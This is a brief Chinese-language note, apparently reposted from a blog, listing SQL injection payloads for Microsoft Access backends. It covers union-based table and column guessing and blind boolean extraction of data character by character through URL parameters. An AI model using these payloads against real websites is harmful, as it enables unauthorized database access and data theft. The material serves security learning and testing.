access数据库结构:
表名 --> 列名 --> 数据
access注入攻击片段
联合查询法:
(1) 判断注入点: ?id=1 and 1=1 ; ?id=1 and 1=2
(2) 猜解表长度: ?id=1 order by 3
(3) 猜解表名: ?id=1 union select 1,2,3 from 表名
(4) 猜解列名: ?id=1 union select 列名,2,3 from 表名
(5) 猜解数据
逐字猜解法:
(1) 查表:?id=1 and exists (select * from 表名)
(2) 查列:?id=1 and exists (select 列名 from 表名)
(3) 查数据:1.确定长度
?id=1 and (select top 1 len(列名) from 表名)=5
2.确定asc数据(asc编码)
?id=1 and (select top 1 asc(mid(列名,位数,1)) from 表名)=97
其他方法:
(1)字典文件收集(社工)
(2)Access偏移注入
原文:https://www.cnblogs.com/China-Waukee/p/9606527.html